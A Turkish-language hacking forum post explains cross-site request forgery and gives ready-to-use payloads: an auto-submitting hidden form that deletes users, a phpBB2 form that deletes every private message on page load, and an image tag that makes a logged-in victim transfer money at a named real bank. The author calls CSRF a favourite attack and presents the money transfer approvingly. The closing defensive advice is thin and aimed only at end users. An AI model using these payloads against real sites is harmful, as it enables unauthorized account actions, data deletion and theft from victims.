Csrf Injection Nedir?Nasıl Yapılır..

  • Konbuyu başlatan Kzsg
  • Başlangıç tarihi
K

Kzsg

Guest
Csrf’nin açılımı Cross-site request forgery‘dir.Bu saldırı yöntemi xss’e çok benzer.Crsf ve XSRF en tehlikeli ve en sevdiğim saldırı türlerinden biridir.

Tanım olarak şöyle diyebiliriz;saldırganın site üzerinde izinsiz olarak veri yollaması değiştirmesi.Yani kullanıcının site üzerinde yapabileceği olayları dışarıdan izinsiz olarak yapmak.Kullanıcı adına mesaj yollamak,çıkış yapmak,yazı yazmak,şayet bir banka sistemiyse para transferi gibi.Crsf’nin xss’ten farkı şudur.Yapılan şeyler direk kullanıcı yetkisiyle yapılır xss’deki gibi cookie çalmaya gerek yoktur.Tabi xss’le örtüşen yanı ise bazı sistemlerde get yöntemi ile işlemler gerçekleştirildiğinden bir sayfaya gömerek kurbana yedirme gibi.

Crsf Saldırıları Nasıl Yapılır

Bu açık session sorgulaması yapmadan işlem yapan sistemlerde kullanılabilir.Bu saldırılar 2 çeşittir biri direk olarak sisteme post ile veri yollarız.
2. yol ise get ile işlemi yapılan bi olayı html kodun içine gömüp kurbana yedirerek yaparız.

İlk Yöntemdeki saldırı için örnek bir crsf exploitine bakmak isterseniz aşşağıya bakın .

Kod:
<form name="f" action="http://www.site/delete.php" method="POST">
<input type="hidden" name="DN" value="test“>
<input type="submit" name="s" class="btn" value="Tıkla Çok Accayip">
</form>
<script language="javascript">
document.forms<0>.submit()
</script>
Bu exploitte virtual script sistemleri için uzaktan kullanıcı silme işlemi yapılıyor http://site/delete.php adresine bir post yollanarak.Bu açık pek çok scrippte mevcut.

Örneği:phpbb sistemleri için pm silme exploiti asağı bak


Kod:
<html>
<head>
</head>
<body onLoad=javascript:document.xsrf.submit()>

<form action="http://[site]/phpBB2/privmsg.php?folder=inbox" method="post"
name="xsrf">
<input type="hidden" name="mode" value="" />
<input type="hidden" name="deleteall" value="true" />
<input type="hidden" name="confirm" value="Yes">

</body>
</html>
2. yönteme gelelim .Kurban siteye giriş yapmış olması gerek.Farzedelim ki kurban sisteme giriş yapmış ve cookie zaman aşımına uğramamış yani hala işlemler gerçekleştirilebilir.Örneğin sistem bir banka olsun.Kurbana bir site yolladık ve içinde şöyle bir kod gizlemiş olalım

<img src="http://halkbank.com.tr/hesapislem.php?hesap=ahmetgüner&tutar=1220">

Bununla halkbankasından get komutuyla ahmet güner hesabına 1220 ytl havale etmiş oluruz. Bu kulağa hoş gelen birşey yanılıyormuyum?

Bu açık pek çok scriptte mevcut.

Bu saldırılardan nasıl korunabiliriz derseniz?

Her işleminizi yaptığınızda cookielerinizi(çerez) siliniz.Zaten sitelerde çıkış linkleri oluyor ordan yapabilirsiniz.Internet explorer kullanıyorsanız artık onu bırakın.

Firefox,Opera gibi daha güvenli tarayıcılar kullanın

Not:Alıntı
 
Üst
Copyright® Ajanlar.org 2012